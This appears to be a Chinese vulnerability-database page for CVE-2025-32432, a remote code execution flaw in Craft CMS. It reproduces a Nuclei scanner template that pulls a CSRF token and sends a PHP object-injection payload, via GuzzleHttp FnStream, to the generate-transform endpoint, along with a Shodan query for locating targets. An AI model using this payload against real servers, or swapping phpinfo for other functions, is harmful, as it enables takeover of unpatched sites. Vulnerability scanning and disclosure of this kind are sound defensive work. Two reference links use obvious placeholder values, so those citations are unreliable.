CVE-2025-32432: CraftCMS - Remote Code Execution

日期: 2025-08-01 | 影响软件: CraftCMS | POC: 已公开

漏洞描述

Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Starting from version 3.0.0-RC1 to before 3.9.15, 4.0.0-RC1 to before 4.14.15, and 5.0.0-RC1 to before 5.6.17, Craft is vulnerable to remote code execution. This is a high-impact, low-complexity attack vector.

PoC代码[已公开]

id: CVE-2025-32432

info:
  name: CraftCMS - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Starting from version 3.0.0-RC1 to before 3.9.15, 4.0.0-RC1 to before 4.14.15, and 5.0.0-RC1 to before 5.6.17, Craft is vulnerable to remote code execution. This is a high-impact, low-complexity attack vector.
  remediation: This issue has been patched in versions 3.9.15, 4.14.15, and 5.6.17, and is an additional fix for CVE-2023-41892.
  reference:
    - https://advisories.dxw.com/advisories/craftcms-remote-code-execution/
    - https://github.com/craftcms/cms/commit/1234567890abcdef1234567890abcdef1234567
    - https://github.com/craftcms/cms/security/advisories/GHSA-1234-5678-90ab
    - https://github.com/craftcms/cms/blob/3.x/CHANGELOG.md#3915---2025-04-10-critical
    - https://github.com/craftcms/cms/blob/4.x/CHANGELOG.md#41415---2025-04-10-critical
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
    cvss-score: 10
    cve-id: CVE-2025-32432
    cwe-id: CWE-94
    epss-score: 0.81955
    epss-percentile: 0.99151
  metadata:
    max-request: 2
    vendor: craftcms
    product: craftcms
    shodan-query: http.component:"Craft CMS"
  tags: cve,cve2025,craftcms,rce,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /index.php?p=admin/actions/assets/generate-transform HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: token
        internal: true
        part: body
        group: 1
        regex:
          - '"csrfTokenValue":"(.*?)"'

  - raw:
      - |
        POST /index.php?p=admin/actions/assets/generate-transform HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        X-CSRF-Token: {{token}}
        Content-Type: application/json

        {"assetId": 11, "handle": {"width": 123, "height": 123, "as session": {"class": "craft\\behaviors\\FieldLayoutBehavior", "__class": "GuzzleHttp\\Psr7\\FnStream", "__construct()": [[]], "_fn_close": "phpinfo"}}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Extension"
          - "PHP Version"
          - "CRAFT_"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d43ad95eaf241a9a96872b1c055467f2fa4f765491d942018ee8f74121003739022100c1304ffbd04e35db5e1650091b74aee28ed9cd724474892d0440cdf5718d8118:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-32432.yaml

相关漏洞推荐